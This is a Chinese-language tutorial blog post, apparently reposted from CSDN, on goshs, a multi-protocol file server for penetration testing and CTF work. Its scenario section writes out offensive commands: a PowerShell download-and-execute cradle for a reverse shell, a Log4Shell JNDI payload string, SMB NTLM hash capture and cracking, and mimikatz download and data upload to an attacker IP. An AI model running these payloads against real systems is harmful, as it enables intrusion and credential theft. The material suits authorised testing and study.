// 红队渗透 · 2026-08-07

goshs:红队与开发者的全能文件服务器

概述

goshs 是一个 Go 语言编写的单二进制文件服务器,专为红队作战、渗透测试和 CTF 场景设计。它远不止是一个文件服务器——它是一个集 HTTP/S、WebDAV、FTP/SFTP、SMB、LDAP/S、DNS、SMTP 于一体的多协议平台,内置 NTLM hash 捕获与破解、反弹 Shell 接收器、Payload 模板引擎等红队利器。

一句话定位:python3 -m http.server 的威力加强版,渗透测试者的瑞士军刀。

项目地址:https://github.com/goshs-labs/goshs 文档:https://docs.goshs.de 在线演示:https://demo.goshs.de


一、核心特性

协议矩阵

协议 支持 典型用途
HTTP/HTTPS ✅ 文件分发、上传下载
WebDAV ✅ 挂载为网络驱动器
FTP/SFTP ✅ 传统文件传输
SMB ✅ NTLM hash 捕获
LDAP/LDAPS ✅ 凭据捕获 + JNDI Log4Shell
DNS ✅ 回调检测
SMTP ✅ 邮件接收
TFTP ✅ 轻量文件传输

红队特色功能

  • NTLM hash 捕获:SMB 服务器自动捕获目标机器的 NTLMv2 hash,内置 wordlist 一键破解
  • LDAP 凭据捕获:模拟 LDAP 服务器,捕获明文凭据 + NTLM hash,支持 JNDI 注入(Log4Shell)
  • DNS 回调:捕获 DNS 查询,验证目标能否出网
  • SMTP 开放中继:接收任意邮件,测试邮件网关
  • Rev Shell Catcher:接收反弹 Shell 并自动生成 Payload
  • Payload 模板引擎:{{.LHOST}}/{{.LPORT}} 自动填充,请求加 ?tpl 即时渲染
  • Share Links:基于 Token 的临时分享,支持下载次数/时间限制
  • TTL 自毁:--ttl 2h 两小时后自动退出,不留痕迹

安全与认证

  • Basic Auth(支持 bcrypt 散列)
  • 证书双向认证
  • IP 白名单
  • 文件级 ACL
  • TLS:自签名 / Let’s Encrypt / 自定义证书

其他功能

  • 文件断点续传(HTTP Range)
  • 拖拽上传、批量 ZIP 下载
  • QR 码生成
  • TUI 终端仪表盘
  • Webhook 通知(Discord/Mattermost/Slack)
  • localhost.run 隧道穿透
  • mDNS 零配置发现
  • JSON API
  • 暗色/亮色主题切换
  • 剪贴板共享
  • 嵌入文件到二进制

二、安装方式

一键安装(推荐):

curl -sSfL https://goshs.de/install.sh | sh

Go 安装:

go install goshs.de/goshs/v2@latest

系统包管理器:

系统 命令
Kali / Parrot sudo apt install goshs
Arch Linux (AUR) yay -S goshs-bin
BlackArch pacman -S goshs
Alpine Linux apk add goshs
Fedora / RHEL dnf copr enable goshs-labs/goshs && dnf install goshs
Homebrew brew install goshs
Scoop scoop bucket add extras && scoop install extras/goshs
winget winget install GoshsLabs.Goshs
Chocolatey choco install goshs
Docker docker run --rm -it -p 8000:8000 -v "$PWD:/pwd" goshs-labs/goshs:latest -d /pwd

源码编译:

git clone https://github.com/goshs-labs/goshs.git
cd goshs
go build -o goshs .

三、详细用法

3.1 HTTP/HTTPS 文件服务器

# 最基本用法:当前目录,端口 8000
goshs

# 指定端口
goshs -p 8080

# 指定监听 IP 和目录
goshs -i 0.0.0.0 -p 8000 -d /var/www

# HTTPS 自签名证书
goshs -s -ss

# HTTPS 自定义证书
goshs -s -sk server.key -sc server.crt

# HTTPS Let's Encrypt 正式证书
goshs -s -sl -sle admin@example.com -sld goshs.example.com

# 只读模式
goshs -ro

# 只上传模式
goshs -uo -uf /path/to/upload

# 静默模式(不列出目录)
goshs -si

# 隐形模式(完全隐藏)
goshs -I

3.2 认证与权限

# Basic Auth
goshs -b 'admin:SuperSecret123'

# Basic Auth + bcrypt 散列密码
goshs -b 'admin:$2a$14$ydRJ//Ob4SctB/D7o.rvU.LmPs/vwXkeXCbtpCqzgOJDSShLgiY52'

# 空用户名 + 密码
goshs -b ':$up3r$3cur3'

# 证书双向认证
goshs -s -ca ca.crt -sk server.key -sc server.crt

# IP 白名单
goshs -ipw 192.168.1.100,10.10.10.5

# 启用 CLI(需同时启用 TLS 和 Auth)
goshs -b 'admin:pass' -s -ss -c

3.3 WebDAV

# 在 8001 端口启动 WebDAV
goshs -w

# 指定 WebDAV 端口
goshs -w -wp 8080

3.4 FTP/SFTP

# FTP 服务器
goshs -ftp -ftp-port 2121

# SFTP 服务器
goshs -ftp -ftp-sftp -ftp-port 2222

# SFTP 公钥认证
goshs -ftp -ftp-sftp -fkf ~/.ssh/authorized_keys

# SFTP 指定主机密钥
goshs -ftp -ftp-sftp -fhk /etc/ssh/ssh_host_ed25519_key

3.5 TFTP

goshs -tftp -tftp-port 69

3.6 SMB — NTLM Hash 捕获

# 捕获 SMB hash,需要 root 权限绑定 445 端口
sudo goshs -smb -smb-domain CORP

# 指定端口、域、共享名
sudo goshs -smb -smb-port 445 -smb-domain CORP -smb-share DATA

# 捕获后自动破解(需提供 wordlist)
sudo goshs -smb -smb-wordlist /usr/share/wordlists/rockyou.txt

攻击流程:

  1. 目标机器上执行 net use \\<攻击者IP>\goshs
  2. goshs 捕获 NTLMv2 hash 并显示在控制台
  3. 自动/手动用 hashcat 或内置 wordlist 破解

3.7 LDAP — 凭据捕获

# LDAP 凭据捕获服务器
goshs -ldap

# LDAP + hash 破解
goshs -ldap -ldap-wordlist /usr/share/wordlists/rockyou.txt

# LDAPS(TLS)
goshs -s -ss -ldap

# JNDI 模式(Log4Shell 利用)
goshs -ldap -ldap-jndi -ldap-jndi-base http://10.10.14.7:8000

3.8 DNS 回调

# DNS 服务器,捕获查询
goshs -dns -dns-ip 10.10.14.7 -dns-port 53

# 需要 root 权限绑定 53 端口
sudo goshs -dns -dns-ip 10.10.14.7

3.9 SMTP 邮件接收

# 开放中继,接收邮件
goshs -smtp -smtp-port 2525 -smtp-domain your-domain.com

3.10 反弹 Shell 接收器

# 启动 Rev Shell Catcher
goshs -rc

# 自动生成 payload 页面,访问 http://<IP>:8000/ 即可看到

3.11 Payload 模板引擎

# 启动模板渲染
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444

# 客户端请求时加 ?tpl 参数,服务端渲染模板
curl 'http://10.10.14.7:8000/rev.ps1?tpl'

支持的模板变量:

  • {{.LHOST}} — 自动从 -i 参数填充
  • {{.LPORT}} — 自定义变量
  • 任意 --tpl-var KEY=VALUE 自定义变量

3.12 Share Links(分享链接)

# 启动后通过 Web UI 操作
# 支持:Token 认证、下载次数限制、时间限制
goshs

3.13 TUI 交互式仪表盘

# 全屏终端仪表盘
goshs --tui

仪表盘包含:

  • HTTP 请求实时日志
  • DNS 查询记录
  • SMB 捕获记录
  • LDAP 捕获记录
  • SMTP 邮件记录
  • 反弹 Shell 视图
  • 剪贴板面板

3.14 其他实用功能

# TTL 自毁(2 小时后退出)
goshs --ttl 2h

# Webhook 通知到 Discord
goshs -W -Wu https://discord.com/api/webhooks/xxx

# JSON 日志输出
goshs -o -V

# 配置文件启动
goshs -C /path/to/config.yaml

# 打印示例配置
goshs -P

# localhost.run 隧道穿透
goshs -t

# mDNS 零配置发现
goshs -m

# 更新到最新版
goshs --update

# 安装 Shell 自动补全
goshs --completion bash
goshs --completion fish
goshs --completion zsh

四、实战场景

场景 1:红队内网文件分发

# 攻击机启动 HTTPS 文件服务器,带认证
goshs -i 10.10.14.7 -s -ss -b 'redteam:P@ssw0rd!'

# 目标机下载工具
curl -k -u 'redteam:P@ssw0rd!' https://10.10.14.7:8000/mimikatz.exe -o mimikatz.exe

# 或浏览器访问上传回显数据
# 目标 POST 上传
curl -k -u 'redteam:P@ssw0rd!' -F 'file=@result.txt' https://10.10.14.7:8000/

场景 2:SMB Relay / Hash 捕获

# 攻击机
sudo goshs -smb -smb-domain CORP -smb-wordlist rockyou.txt

# 目标执行
net use \\10.10.14.7\goshs

# 控制台输出:
# [+] SMB NTLMv2 hash captured for CORP\\Administrator
# [+] Hash: Administrator::CORP:1122334455667788:...snip...
# [+] Attempting to crack with rockyou.txt...
# [+] Password found: P@ssw0rd123!

场景 3:Payload 模板分发

# 攻击机
echo 'powershell -NoP -NonI -W Hidden -Exec Bypass -C "IEX(New-Object Net.WebClient).downloadString(''http://{{.LHOST}}:{{.LPORT}}/shell.ps1'')"' > rev.ps1
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444

# 目标执行
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:8000/rev.ps1?tpl')"

场景 4:Log4Shell 利用

# 启动 LDAP JNDI 服务器
goshs -ldap -ldap-jndi -ldap-jndi-base http://10.10.14.7:8000/

# 启动 HTTP 服务器提供恶意类
goshs -d /path/to/exploit-classes

# 目标触发
${jndi:ldap://10.10.14.7:389/Exploit}

场景 5:内网穿透 + 远程文件服务器

# 通过 localhost.run 隧道暴露到公网
goshs -i 127.0.0.1 -p 8000 -t

# 输出会显示一个 public URL,如
# https://random-name.lhr.life

五、与同类工具对比

特性 goshs python3 -m http.server updog impacket-smbserver
HTTPS ✅ ❌ ✅ ❌
多协议 ✅ HTTP/S/FTP/SMB/LDAP/DNS/SMTP ❌ ❌ ❌ SMB only
SMB Hash 捕获 ✅ 内置破解 ❌ ❌ ✅ 无破解
LDAP 捕获 ✅ JNDI 模式 ❌ ❌ ❌
Payload 模板 ✅ ❌ ❌ ❌
Rev Shell Catcher ✅ ❌ ❌ ❌
TUI 仪表盘 ✅ ❌ ❌ ❌
Share Links ✅ ❌ ❌ ❌
单二进制 ✅ ❌ ❌ ❌
跨平台 ✅ ✅ ✅ ✅
WebDAV ✅ ❌ ❌ ❌

六、总结

goshs 是目前红队场景下最全面的单二进制文件服务器。它的核心优势在于:

  1. 一体集成:一个二进制替代 HTTP/S、FTP/SFTP、SMB、LDAP、DNS、SMTP 多个工具
  2. 红队原生:NTLM hash 捕获、LDAP 凭据窃取、反弹 Shell 接收、Payload 模板——都是渗透测试的刚需
  3. 部署极简:单文件,零依赖,curl 一键安装
  4. 操作友好:TUI 仪表盘、Web UI、CLI 三种操作界面
  5. 安全可控:TTL 自毁、IP 白名单、多种认证方式

无论是渗透测试、CTF 比赛,还是日常开发调试,goshs 都是一个值得常备 toolbox 的工具。

原文 https://blog.csdn.net/2301_79518550/article/details/163566295